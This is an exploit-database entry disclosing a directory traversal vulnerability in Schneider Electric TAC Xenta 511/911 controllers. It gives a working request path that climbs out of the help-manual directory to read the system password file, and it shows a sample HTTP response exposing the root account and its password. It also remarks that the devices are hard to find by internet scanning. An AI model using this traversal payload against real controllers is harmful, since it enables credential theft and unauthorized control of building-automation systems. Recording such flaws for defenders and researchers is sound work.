TAC Xenta 511/911 - Directory Traversal

EDB-ID: 44809
Author: Marek Cybul
Published: 2018-05-31
CVE: N/A
Type: Webapps
Platform: Hardware
Vulnerable App: N/A

 # Date: 25.05.2018 
 # Exploit Author: Marek Cybul 
 # Vendor Homepage: 
 https://download.schneider-electric.com/files?p_File_Name=TAC_Xenta_911_SDS-XENTA911.pdf 
 # Version: 5.17 
  
 # Schneider Electric TAC Xenta 911 and 511 PLCs 
  
 Directory traversal in help manuals allows for credentials extraction 
  
 Devices are not indexed by crawlers like Shodan or Censys due to 
 ancient SSL configuration, 
 needed to use old browser to support it (not even s_client, curl or 
 ncat could connect). 
  
  
 Example URI: /www/help/public/../../../sys/pswd 
  
 vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv 
  
 HTTP/1.0 200 OK 
  
 root 
 super user 
 / 
 / 
 / 
 password 
 0 
 900 
 3

Source: www.exploit-db.com

Exploit Collector

Search Exploit

TAC Xenta 511/911 - Directory Traversal